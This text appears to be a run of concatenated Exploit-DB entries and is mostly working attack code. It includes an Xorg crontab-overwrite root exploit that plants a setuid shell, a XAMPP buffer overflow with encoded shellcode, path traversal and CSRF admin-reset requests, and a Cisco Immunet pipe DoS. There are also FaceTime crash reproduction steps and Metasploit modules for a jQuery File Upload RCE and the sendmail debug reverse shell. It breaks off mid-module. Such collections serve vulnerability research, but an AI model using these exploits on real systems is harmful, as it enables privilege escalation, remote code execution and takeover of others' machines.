# Exploit Author: Yair Rodríguez Aparicio
# Vendor Homepage: https://www.globalscape.com/cuteftp
# Software Link: http://go.globalscape.com/download/cuteftp-macosx
# Version: 3.1
# Tested on: macOS High Sierra 10.13
# Steps to Produce the Crash:
# 1.- Run python code : python cute.py
# 2.- Open text.txt and copy content to clipboard
# 3.- Open CuteFTP Mac
# 4.- Clic on "Quick Connect"
# 4.- Paste clipboard on "Host", "User", "Password" and "Port"
# 5.- click on "Run"
# 6.- Crashed!
buffer = "\x41" * 2000
f = open("text.txt", "w")
f.write(buffer)
f.close()
# Exploit Title: xorg-x11-server < 1.20.1 - Local Privilege Escalation (RHEL 7)
# Date: 2018-11-07
# Exploit Author: @bolonobolo
# Vendor Homepage: https://www.x.org/
# Version: 1.19.5
# Tested on: RHEL 7.3 && 7.5
# CVE : CVE-2018-14665
# Explanation
# The only condition that have to be met for this PE to work via SSH, is that the legitimate non-root user
# has to be logged in trought console at the moment the PE script launched.
# In fact during the logged in session of the legitimate non-root user,
# a file with the name of the non-root user will be created in the /var/run/console folder.
# With that file present, the same non-root user can launch a Xorg command via SSH.
#
# Usage: $ python poc.py
# $ python poc.py
# [*] Waiting for bolo to connect to the console
# [*] OK --> bolo console opened
# [*] Building root shell wait 2 minutes
# [*] crontab overwritten
#
# ... cut Xorg output ...
#
# [*] Xorg killed
# (II) Server terminated successfully (0). Closing log file.
# [*] Don't forget to cleanup /etc/crontab and /tmp dir
# sh-4.2# id && whoami
# uid=0(root) gid=0(root) gruppi=0(root),1001(bolo)
# root
# sh-4.2#
#!/usr/bin/python
import os
import getpass
import subprocess
userList = []
path="/var/run/console/"
def getWhoami():
return getpass.getuser()
def getConsole(path):
p = subprocess.Popen(["ls", path], stdout=subprocess.PIPE)
(console, err) = p.communicate()
consoleList = str.splitlines(console)
return consoleList
def payload():
f = open("/tmp/payload", "w")
payload = ("cp /bin/sh /usr/local/bin/shell\n"
"echo \"#include <stdio.h> \" > /tmp/shell.c\n"
"echo \"#include <stdlib.h>\" >> /tmp/shell.c\n"
"echo \"#include <sys/types.h>\" >> /tmp/shell.c\n"
"echo \"#include <unistd.h>\" >> /tmp/shell.c\n"
"echo 'int main(){setuid(0);setgid(0);system(\"/bin/sh\");}' >> /tmp/shell.c\n"
"gcc /tmp/shell.c -o /usr/local/bin/shell\n"
"chmod 4777 /usr/local/bin/shell\n")
f.write(payload)
def executePayload():
os.system("chmod +x /tmp/payload")
os.system("cd /etc; Xorg -fp \"* * * * * root /tmp/payload\" -logfile crontab :1 &")
print "[*] crontab overwritten"
os.system("sleep 5")
os.system("pkill Xorg")
print "[*] Xorg killed"
os.system("sleep 120")
return
def main():
whoami = getWhoami()
print "[*] Waiting for " + whoami + " to connect to the console"
i = 0
while (i == 0):
consoleList = getConsole(path)
for user in consoleList:
if user == whoami :
print "[*] OK --> " + user + " console opened"
i = 1
print "[*] Building root shell wait 2 minutes"
payload()
executePayload()
print "[*] Don't forget to cleanup /etc/crontab and /tmp dir"
os.system("/usr/local/bin/shell")
if __name__ == '__main__':
main()
# Exploit Title: Musicco 2.0.0 - Arbitrary Directory Download
# Dork: N/A
# Date: 2018-11-09
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.musicco.app/
# Software Link: https://codeload.github.com/micser/musicco/zip/master
# Version: 2.0.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/?getAlbum&parent=[Directory]&album=Efe
# /[PATH]/index.php
#3592 } elseif (isset($_GET['getAlbum'])) {
#3593 $parent = $_GET['parent'];
#3594 $album = $_GET['album'];
#3595 $rootPath = realpath($parent);
#3596 $zip = new ZipArchive();
#3597 $zip->open('./'.Musicco::getConfig('tempFolder').'/'.$album.'.zip', ZipArchive::CREATE | ZipArchive::OVERWRITE);
GET /[PATH]/?getAlbum&parent=../../../../Efe_S1/apache/conf&album=Efe HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Date: Fri, 09 Nov 2018 14:24:42 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Set-Cookie: musicco=rlparl6g67tsok72of1ln5tj23; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Disposition: attachment;filename="Efe.zip"
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/zip, application/octet-stream
/*
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/CISCO-IMMUNET-AND-CISCO-AMP-FOR-ENDPOINTS-SYSTEM-SCAN-DENIAL-OF-SERVICE.txt
[+] ISR: ApparitionSec
***Greetz: indoushka | Eduardo B.***
[Vendor]
www.cisco.com
[Multiple Products]
Cisco Immunet < v6.2.0 and Cisco AMP For Endpoints v6.2.0
Cisco Immunet is a free, cloud-based, community-driven antivirus application, using the ClamAV and its own engine.
The software is complementary with existing antivirus software.
Cisco AMP (Advanced Malware Protection)
Advanced Malware Protection (AMP) goes beyond point-in-time capabilities and is built to protect organizations before, during, and after an attack.
[Vulnerability Type]
System Scan Denial of Service
[CVE Reference]
CVE-2018-15437
Cisco Advisory ID: cisco-sa-20181107-imm-dos
Cisco Bug ID: CSCvk70945
Cisco Bug ID: CSCvn05551
CVSS Score:
Base 5.5 CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:X/RL:X/RC:X
[Security Issue]
A vulnerability in the system scanning component of Cisco Immunet and Cisco Advanced Malware Protection (AMP) for Endpoints running on
Microsoft Windows could allow a local attacker to disable the scanning functionality of the product.
This could allow executable files to be launched on the system without being analyzed for threats.
The vulnerability is due to improper process resource handling.
An attacker could exploit this vulnerability by gaining local access to a system running Microsoft Windows and protected by Cisco Immunet or
Cisco AMP for Endpoints and executing a malicious file.
A successful exploit could allow the attacker to prevent the scanning services from functioning properly and ultimately prevent the system from
being protected from further intrusion.
There are no workarounds that address this vulnerability.
Issue is due to a NULL DACL (RW Everyone) resulting in a system scan Denial Of Service vulnerability for both of these endpoint protection programs.
The affected end user will get pop up warning box when attempting to perform a file or system scan,
"You Can Not Scan at This Time
"The Immunet service is not running.
Please restart the service and retry."
Below I provide details to exploit Cisco Immunet, however "Cisco AMP For Endpoints" is also affected so the exploit can easily be ported.
[References]
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20181107-imm-dos
[Vulnerability Details]
Pipe is Remote Accessible PIPE_REJECT_REMOTE_CLIENTS not present.
FILE_FLAG_FIRST_PIPE_INSTANCE not present.
Max Pipe Instances = FF (255)
loc_140028140:
lea rax, [rbp+57h+pSecurityDescriptor]
mov [rbp+57h+SecurityAttributes.nLength], 18h
mov edx, 1 ; dwRevision
mov [rbp+57h+SecurityAttributes.lpSecurityDescriptor], rax
lea rcx, [rbp+57h+pSecurityDescriptor] ; pSecurityDescriptor
mov [rbp+57h+SecurityAttributes.bInheritHandle], 1
call cs:InitializeSecurityDescriptor
xor r9d, r9d ; bDaclDefaulted
lea rcx, [rbp+57h+pSecurityDescriptor] ; pSecurityDescriptor
xor r8d, r8d ; pDacl
lea edx, [r9+1] ; bDaclPresent
call cs:SetSecurityDescriptorDacl
mov rcx, [rdi+18h] ; lpName
lea rax, [rbp+57h+SecurityAttributes]
mov [rsp+100h+lpSecurityAttributes], rax ; lpSecurityAttributes
mov edx, 40000003h ; dwOpenMode
mov [rsp+100h+nDefaultTimeOut], esi ; nDefaultTimeOut
mov r9d, 0FFh ; nMaxInstances
mov [rsp+100h+nInBufferSize], 2000h ; nInBufferSize
mov r8d, 6 ; dwPipeMode
mov [rsp+100h+nOutBufferSize], 2000h ; nOutBufferSize
call cs:CreateNamedPipeW
mov [rdi+8], rax
call cs:GetLastError
test eax, eax
jz short loc_140028203
[Exploit/POC]
"Cisco-Immunet-Exploit.c"
*/
#include <windows.h>
#define pipename "\\\\.\\pipe\\IMMUNET_SCAN"
/* Discovered by hyp3rlinx
CVE-2018-15437 */
int main(void) {
while (TRUE){
HANDLE pipe = CreateNamedPipe(pipename, PIPE_ACCESS_INBOUND | PIPE_ACCESS_OUTBOUND , PIPE_WAIT, 1, 1024, 1024, 120 * 1000, NULL);
if (pipe == INVALID_HANDLE_VALUE){
printf("Error: %d", GetLastError());
}else{
printf("%s","pipe created\n");
printf("%x",pipe);
}
ConnectNamedPipe(pipe, NULL);
if(ImpersonateNamedPipeClient(pipe)){
printf("ok!");
}else{
printf("%s%d","WTF",GetLastError());
}
CloseHandle(pipe);
}
return 0;
}
/*
[Network Access]
Local / Remote
[Severity]
High
Disclosure Timeline
=============================
Vendor Notification: August 7, 2018
Vendor acknowledgement: August 7, 2018
Vendor released fixes: November 7th, 2018
November 8, 2018 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
*/
# Exploit Title: Data Center Audit 2.6.2 - Cross-Site Request Forgery (Update Admin)
# Dork: N/A
# Date: 2018-11-09
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://sourceforge.net/projects/datacenteraudit/
# Software Link: https://netix.dl.sourceforge.net/project/datacenteraudit/data_center_audit_v262.zip
# Version: 2.6.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/dca_resetpw.php
#
POST /[PATH]/dca_resetpw.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 57
updateuser=admin&pass=efe&pass2=efe&submit_reset=VerAyari
HTTP/1.1 200 OK
Date: Fri, 09 Nov 2018 12:47:37 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Content-Length: 842
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
# POC:
# 2)
# http://localhost/[PATH]/dca_resetpw.php
#
<html>
<body>
<form action="http://localhost/[PATH]/dca_resetpw.php" method="post">
Username:admin
<input name="updateuser" value="admin" type="hidden">
New Password:
<input name="pass" maxlength="10" type="password">
Confirm Password:
<input name="pass2" maxlength="10" type="password">
input name="submit_reset" value="Change Password" type="submit">
</table>
</form>
</body>
</html>
# Exploit Title: XAMPP Control Panel 3.2.2 - Buffer Overflow (SEH) (Unicode)
# Exploit Author: Gionathan "John" Reale (0-day DoS exploit), Semen Alexandrovich Lyhin (1-day fully working exploit).
# Shellcode Author: Giuseppe D'Amore (EDB:28996)
# Date: 2018-11-08.
# Software: XAMPP
# Version: 3.2.2 / 7.2.9 (Newest version at time of writing)
# Download: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/7.2.9/xampp-portable-win32-7.2.9-0-VC15-installer.exe/download
# Tested on: Windows 10 64bit with XAMPP 32bit. Should work on any Windows since XP.
# Special thanks to Deloitte Ukraine for providing a few payed hours to create this exploit.
# Steps to Reproduce:
# Run the python exploit script, it will create a new file with the name "exploit.txt".
# Copy the contents of "exploit.txt"
# Start the program and click "Config (Top Right With Symbol)"
# Paste the contents of "exploit.txt" into the following field: "Editor".
# Click "Save" and then in the main window Click "Config" > "Apache (httpd.conf)".
# You will see that arbitrary code is executed. It should pop a messagebox.
#cat 28996.bin | msfvenom -p - -a x86 --platform win -f py -e x86/unicode_mixed BufferRegister=EAX
#Length is 352, but double it.
buf = ""
buf += "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += "\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += "\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
buf += "\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
buf += "\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
buf += "\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
buf += "\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
buf += "\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
buf += "\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
buf += "\x47\x42\x39\x75\x34\x4a\x42\x50\x31\x4a\x32\x68\x32"
buf += "\x50\x30\x61\x54\x34\x4b\x4a\x72\x74\x4b\x72\x32\x6a"
buf += "\x6c\x44\x4b\x4e\x72\x4d\x4c\x62\x6b\x4d\x72\x79\x78"
buf += "\x62\x6b\x31\x62\x4d\x50\x34\x4b\x4b\x62\x31\x70\x51"
buf += "\x6e\x6a\x6c\x50\x33\x62\x55\x68\x72\x75\x39\x69\x37"
buf += "\x4a\x63\x51\x68\x6f\x4c\x52\x6b\x4f\x67\x44\x38\x4a"
buf += "\x61\x45\x72\x52\x6b\x33\x4a\x4f\x30\x7a\x61\x77\x57"
buf += "\x4e\x51\x38\x6d\x64\x4b\x4d\x64\x74\x6f\x4a\x61\x36"
buf += "\x66\x70\x45\x42\x61\x6d\x6e\x4e\x66\x43\x31\x64\x34"
buf += "\x50\x61\x72\x55\x58\x72\x32\x61\x53\x4e\x49\x78\x6f"
buf += "\x55\x51\x68\x32\x49\x53\x44\x32\x55\x57\x79\x52\x6b"
buf += "\x53\x4a\x6f\x34\x4a\x61\x55\x77\x6f\x76\x62\x6b\x6e"
buf += "\x4c\x50\x6f\x54\x4b\x51\x6a\x6d\x4c\x6d\x31\x36\x67"
buf += "\x42\x6b\x63\x4c\x36\x4f\x79\x6c\x39\x71\x37\x57\x72"
buf += "\x48\x4d\x75\x4f\x54\x4f\x31\x6b\x51\x33\x38\x30\x4c"
buf += "\x6e\x6f\x71\x39\x4e\x74\x50\x68\x6b\x70\x51\x35\x6f"
buf += "\x68\x42\x30\x71\x79\x69\x51\x59\x6e\x70\x49\x5a\x6b"
buf += "\x4c\x71\x47\x50\x4e\x71\x62\x30\x69\x6f\x59\x47\x41"
buf += "\x41"
# venetian padding
ven = "\x53" #push esi
ven += "\x43" #align
ven += "\x58" #pop eax
ven += "\x43" #align
ven += "\x05\x50\x11" #add eax,11005000
ven += "\x43" #align
ven += "\x2d\x1c\x11" #sub eax,33001700
ven += "\x43" #align
ven += "\x48" #dec eax
ven += "\x43" #align
ven += "\x43"*2 #nops
payload = "\x43"*270 + "\x37\x53" + ven + buf + "\x43" * (6000 - 2 - 270 - len(ven+buf))
try:
f=open("exploit.txt","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
There are a variety of problems that occur when processing malformed H264 streams in readSPSandGetDecoderParams, leading to OOB read, OOB write and stack_chk crashes. I think the root cause is stack corruption. This issue can occur if someone accepts a malicious FaceTime call.
To reproduce the issue:
On the target device:
1) build no-encrypt.c (gcc -dynamiclib -o mylib)
2) copy the file to /usr/lib/mylib
3) Use insert_dylib (https://github.com/Tyilo/insert_dylib) to add /usr/lib/mylib to AVConference (insert_dylib --strip-codesig /usr/lib/mylib AVConference)
This will strip encryption to allow the target to receive unencrypted packets. It is also possible to repro this issue using the method described in issue 1634 , but it is much more reliable and debuggable with the unencrypted packets
On the host device:
1) Build video-replay.c attached (gcc -g -dynamiclib -o mylib video-replay.c) and copy to /usr/lib/mylib
2) Use bspatch to apply the attached binpatch to /System/Library/PrivateFrameworks/AVConference.framework/Versions/Current/AVConference. The version I patched has an md5 sum of 0de78198e29ae43e686f59d550150d1b and the patched version has an md5 sum of af5bb770f08e315bf471a0fadcf96cf8. This patch alters SendRTP to retrieve the length of an encrypted packet from offset 0x650 of the encrypted buffer, as the existing code doesn't respect the output size returned from CCCryptorUpdate
3) Use insert_dylib (https://github.com/Tyilo/insert_dylib) to add /usr/lib/mylib to AVConference (insert_dylib --strip-codesig /usr/lib/mylib AVConference)
4) Edit /System/Library/Sandbox/Profiles/com.apple.avconferenced.sb to add /out as allow file read and write
5) Restart the machine
6) Extract the attached sc.zip to /out and change the permissions so it's readable by AVConference
7) Call target, when they pick up, AVConference will crash
When I reproduced this, my host was a Mac mini running version 10.13.6. My target was a MacBook Pro running 10.13.6. This PoC only works on a Mac, but the vulnerable code appears to be in iOS 11.3.1 as well.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45787.zip
There is a heap corruption vulnerability in VCPDecompressionDecodeFrame which is called by FaceTime. This bug can be reached if a user accepts a call from a malicious peer.
The issue can be reproduced using the attached sequence of RTP packets. To reproduce the issue:
1) Build video-replay.c attached (gcc -g -dynamiclib -o mylib video-replay.c) and copy to /usr/lib/mylib
2) Use bspatch to apply the attached binpatch to /System/Library/PrivateFrameworks/AVConference.framework/Versions/Current/AVConference. The version I patched has an md5 sum of 0de78198e29ae43e686f59d550150d1b and the patched version has an md5 sum of af5bb770f08e315bf471a0fadcf96cf8. This patch alters SendRTP to retrieve the length of an encrypted packet from offset 0x650 of the encrypted buffer, as the existing code doesn't respect the output size returned from CCCryptorUpdate
3) Use insert_dylib (https://github.com/Tyilo/insert_dylib) to add /usr/lib/mylib to AVConference (insert_dylib --strip-codesig /usr/lib/mylib AVConference)
4) Edit /System/Library/Sandbox/Profiles/com.apple.avconferenced.sb to add /out as allow file read and write
5) Restart the machine
6) Extract the attached out.zip to /out and change the permissions so it's readable by AVConference
7) Call target, when they pick up, AVConference will crash
When I reproduced this, my host was a Mac mini running version 10.13.6. My target was a MacBook Pro running 10.13.6. This PoC only works on a Mac, but the vulnerable code appears to be in iOS 11.3.1 as well.
* thread #27, name = 'com.apple.avconference.soundplayer.recvproc', stop reason = EXC_BAD_ACCESS (code=1, address=0x21c6a1ff6)
frame #0: 0x00007fff6bd71892 VideoProcessing`___lldb_unnamed_symbol2778$$VideoProcessing + 4492
VideoProcessing`___lldb_unnamed_symbol2778$$VideoProcessing:
-> 0x7fff6bd71892 <+4492>: movl (%rcx,%rbx), %r8d
0x7fff6bd71896 <+4496>: bswapl %r8d
0x7fff6bd71899 <+4499>: movl %eax, %ecx
0x7fff6bd7189b <+4501>: shll %cl, %r8d
Target 0: (avconferenced) stopped.
(lldb) bt
* thread #27, name = 'com.apple.avconference.soundplayer.recvproc', stop reason = EXC_BAD_ACCESS (code=1, address=0x21c6a1ff6)
* frame #0: 0x00007fff6bd71892 VideoProcessing`___lldb_unnamed_symbol2778$$VideoProcessing + 4492
frame #1: 0x00007fff6bd976b6 VideoProcessing`___lldb_unnamed_symbol3007$$VideoProcessing + 117
frame #2: 0x00007fff6bda4eb9 VideoProcessing`___lldb_unnamed_symbol3043$$VideoProcessing + 513
frame #3: 0x00007fff6bda4b76 VideoProcessing`___lldb_unnamed_symbol3042$$VideoProcessing + 560
frame #4: 0x00007fff6bd6b252 VideoProcessing`___lldb_unnamed_symbol2741$$VideoProcessing + 4206
frame #5: 0x00007fff53cf67f4 VideoToolbox`___lldb_unnamed_symbol79$$VideoToolbox + 1233
frame #6: 0x00007fff53cf5373 VideoToolbox`___lldb_unnamed_symbol59$$VideoToolbox + 401
frame #7: 0x00007fff6bca7381 VideoProcessing`VCPDecompressionSessionDecodeFrame + 423
frame #8: 0x000000010bb86bab AVConference`VideoPlayer_ShowFrame + 1384
frame #9: 0x000000010bb8cf98 AVConference`VideoReceiver_ShowFrame + 740
frame #10: 0x000000010bb8c5be AVConference`VideoReceiver_VideoAlarm + 720
frame #11: 0x000000010bb78933 AVConference`SoundPlayer_AlarmThread + 364
frame #12: 0x00007fff484fe98b CoreMedia`figThreadMain + 277
frame #13: 0x00007fff6f6a6661 libsystem_pthread.dylib`_pthread_body + 340
frame #14: 0x00007fff6f6a650d libsystem_pthread.dylib`_pthread_start + 377
frame #15: 0x00007fff6f6a5bf9 libsystem_pthread.dylib`thread_start + 13
I've improved the PoC a lot for this, an updated video-replay.c is attached. This version does not require the binary patch for the sender binary, other than adding the library with insert_dylib. So to use this one:
1) Build video-replay.c attached (g++ -std=c++11 -g -dynamiclib -o mylib video-replay.c) and copy to /usr/lib/mylib
2) Use insert_dylib (https://github.com/Tyilo/insert_dylib) to add /usr/lib/mylib to AVConference (insert_dylib --strip-codesig /usr/lib/mylib AVConference)
3) Edit /System/Library/Sandbox/Profiles/com.apple.avconferenced.sb to add /out as allow file read and write
4) Restart the machine
5) Extract the attached out.zip to /out and change the permissions so it's readable by AVConference
6) Call target with FaceTime, when they pick up, AVConference will crash
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45788.zip
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::PhpEXE
def initialize(info = {})
super(update_info(info,
'Name' => "blueimp's jQuery (Arbitrary) File Upload",
'Description' => %q{
This module exploits an arbitrary file upload in the sample PHP upload
handler for blueimp's jQuery File Upload widget in versions <= 9.22.0.
Due to a default configuration in Apache 2.3.9+, the widget's .htaccess
file may be disabled, enabling exploitation of this vulnerability.
This vulnerability has been exploited in the wild since at least 2015
and was publicly disclosed to the vendor in 2018. It has been present
since the .htaccess change in Apache 2.3.9.
This module provides a generic exploit against the jQuery widget.
},
'Author' => [
'Claudio Viviani', # WordPress Work the Flow (Arbitrary) File Upload
'Larry W. Cashdollar', # (Re)discovery, vendor disclosure, and PoC
'wvu' # Metasploit module
],
'References' => [
['CVE', '2018-9206'],
['URL', 'http://www.vapidlabs.com/advisory.php?v=204'],
['URL', 'https://github.com/blueimp/jQuery-File-Upload/pull/3514'],
['URL', 'https://github.com/lcashdol/Exploits/tree/master/CVE-2018-9206'],
['URL', 'https://www.homelab.it/index.php/2015/04/04/wordpress-work-the-flow-file-upload-vulnerability/'],
['URL', 'https://github.com/rapid7/metasploit-framework/pull/5130'],
['URL', 'https://httpd.apache.org/docs/current/mod/core.html#allowoverride']
],
'DisclosureDate' => 'Oct 9 2018', # Larry's disclosure to the vendor
'License' => MSF_LICENSE,
'Platform' => ['php', 'linux'],
'Arch' => [ARCH_PHP, ARCH_X86, ARCH_X64],
'Privileged' => false,
'Targets' => [
['PHP Dropper', 'Platform' => 'php', 'Arch' => ARCH_PHP],
['Linux Dropper', 'Platform' => 'linux', 'Arch' => [ARCH_X86, ARCH_X64]]
],
'DefaultTarget' => 0
))
register_options([
OptString.new('TARGETURI', [true, 'Base path', '/jQuery-File-Upload'])
])
end
def version_paths
%w[
/package.json
/bower.json
].map { |u| normalize_uri(target_uri.path, u) }
end
# List from PoC sorted by frequency
def upload_paths
%w[
/server/php/index.php
/server/php/upload.class.php
/server/php/UploadHandler.php
/example/upload.php
/php/index.php
].map { |u| normalize_uri(target_uri.path, u) }
end
def check
a = nil
version_paths.each do |u|
vprint_status("Checking #{u}")
res = send_request_cgi(
'method' => 'GET',
'uri' => u
)
next unless res
unless a
res.headers['Server'] =~ /Apache\/([\d.]+)/ &&
$1 && (a = Gem::Version.new($1))
if a && a >= Gem::Version.new('2.3.9')
vprint_good("Found Apache #{a} (AllowOverride None may be set)")
elsif a
vprint_warning("Found Apache #{a} (AllowOverride All may be set)")
end
end
next unless res.code == 200 && (j = res.get_json_document) &&
j['version'] && (v = Gem::Version.new(j['version']))
if v <= Gem::Version.new('9.22.0')
vprint_good("Found unpatched jQuery File Upload #{v}")
return CheckCode::Appears
else
vprint_error("Found patched jQuery File Upload #{v}")
return CheckCode::Safe
end
end
CheckCode::Unknown
end
def find_upload
upload_paths.each do |u|
vprint_status("Checking #{u}")
res = send_request_cgi(
'method' => 'GET',
'uri' => u
)
if res && res.code == 200
vprint_good("Found #{u}")
return u
end
end
nil
end
def exploit
unless check == CheckCode::Appears && (u = find_upload)
fail_with(Failure::NotFound, 'Could not find target')
end
f = "#{rand_text_alphanumeric(8..42)}.php"
p = normalize_uri(File.dirname(u), 'files', f)
print_status('Uploading payload')
res = upload_payload(u, f)
unless res && res.code == 200 && res.body.include?(f)
fail_with(Failure::NotVulnerable, 'Could not upload payload')
end
print_good("Payload uploaded: #{full_uri(p)}")
print_status('Executing payload')
exec_payload(p)
print_status('Deleting payload')
delete_payload(u, f)
end
def upload_payload(u, f)
p = get_write_exec_payload(unlink_self: true)
m = Rex::MIME::Message.new
m.add_part(p, nil, nil, %(form-data; name="files[]"; filename="#{f}"))
send_request_cgi(
'method' => 'POST',
'uri' => u,
'ctype' => "multipart/form-data; boundary=#{m.bound}",
'data' => m.to_s
)
end
def exec_payload(p)
send_request_cgi({
'method' => 'GET',
'uri' => p
}, 1)
end
def delete_payload(u, f)
send_request_cgi(
'method' => 'DELETE',
'uri' => u,
'vars_get' => {'file' => f}
)
end
end
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'expect'
class MetasploitModule < Msf::Exploit::Remote
# cmd/unix/reverse spams the session with Telnet codes on EOF
Rank = AverageRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Morris Worm sendmail Debug Mode Shell Escape',
'Description' => %q{
This module exploits sendmail's well-known historical debug mode to
escape to a shell and execute commands in the SMTP RCPT TO command.
This vulnerability was exploited by the Morris worm in 1988-11-02.
Cliff Stoll reports on the worm in the epilogue of The Cuckoo's Egg.
Currently only cmd/unix/reverse and cmd/unix/generic are supported.
},
'Author' => [
'Robert Tappan Morris', # Exploit and worm for sure
'Cliff Stoll', # The Cuckoo's Egg inspiration
'wvu' # Module and additional research
],
'References' => [
['URL', 'https://en.wikipedia.org/wiki/Morris_worm'], # History
['URL', 'https://spaf.cerias.purdue.edu/tech-reps/823.pdf'], # Analysis
['URL', 'https://github.com/arialdomartini/morris-worm'], # Source
['URL', 'http://gunkies.org/wiki/Installing_4.3_BSD_on_SIMH'] # Setup
],
'DisclosureDate' => 'Nov 2 1988',
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Privileged' => false, # DefUid in src/conf.c, usually "daemon"
'Payload' => {'Compat' => {'RequiredCmd' => 'generic telnet'}},
'Targets' => [
# https://en.wikipedia.org/wiki/Source_Code_Control_System
['@(#)version.c 5.51 (Berkeley) 5/2/86', {}]
],
'DefaultTarget' => 0,
'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse'}
))
register_options([Opt::RPORT(25)])
register_advanced_options([
OptFloat.new('SendExpectTimeout', [true, 'Timeout per send/expect', 3.5])
])
end
def check
checkcode = CheckCode::Safe
connect
res = sock.get_once
return CheckCode::Unknown unless res
if res =~ /^220.*Sendmail/
checkcode = CheckCode::Detected
end
sock.put("DEBUG\r\n")
res = sock.get_once
return checkcode unless res
if res.start_with?('200 Debug set')
checkcode = CheckCode::Appears
end
checkcode
rescue Rex::ConnectionError => e
vprint_error(e.message)
CheckCode::Unknown
ensure
disconnect
end
def exploit
# We don't care who the user is, so randomize it
from = rand_text_alphanumeric(8..42)
# Strip mail header with sed(1), pass to sh(1), and ensure a clean exit
to = %("| sed '1,/^$/d' | sh; exit 0")
# We don't have $PATH, so set one
path = '/bin:/usr/bin:/usr/ucb:/etc'
sploit = {
nil => /220.*Sendmail/,
'DEBUG' => /200 Debug set/,
"MAIL FROM:<#{from}>" => /250.*Sender ok/,
"RCPT TO:<#{to}>" => /250.*Recipient ok/,
'DATA' => /354 Enter mail/,
# Indent PATH= so it's not interpreted as part of the mail header
" PATH=#{path}" => nil,
'export PATH' => nil,
payload.encoded => nil,
'.' => /250 Ok/,
'QUIT' => /221.*closing connection/
}
print_status('Connecting to sendmail')
connect
print_status('Enabling debug mode and sending exploit')
sploit.each do |line, pattern|
Timeout.timeout(datastore['SendExpectTimeout']) do
if line
print_status("Sending: #{line}")
sock.put("#{line}\r\n")
end
if pattern
vprint_status("Expecting: #{pattern.inspect}")
sock.expect(pattern) do |pat|
return unless pat
vprint_good("Received: #{pat.first}")
end
end
end
end
rescue Rex::ConnectionError => e
fail_with(Failure::Unreachable, e.message)
rescue Timeout::Error
fail_with(Failure::TimeoutExpired, 'SendExpectTimeout maxed out')
ensure
disconnect
end
def on_new_session(session)
print_warning("Do NOT type `exit', or else you may lose further shells!")
print_warning('Hit ^C to abort the session instead, please and thank you')
end
end
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
# This is so one-off that we define it here
ARCH_VAX = 'vax'
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Morris Worm fingerd Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in fingerd on 4.3BSD.
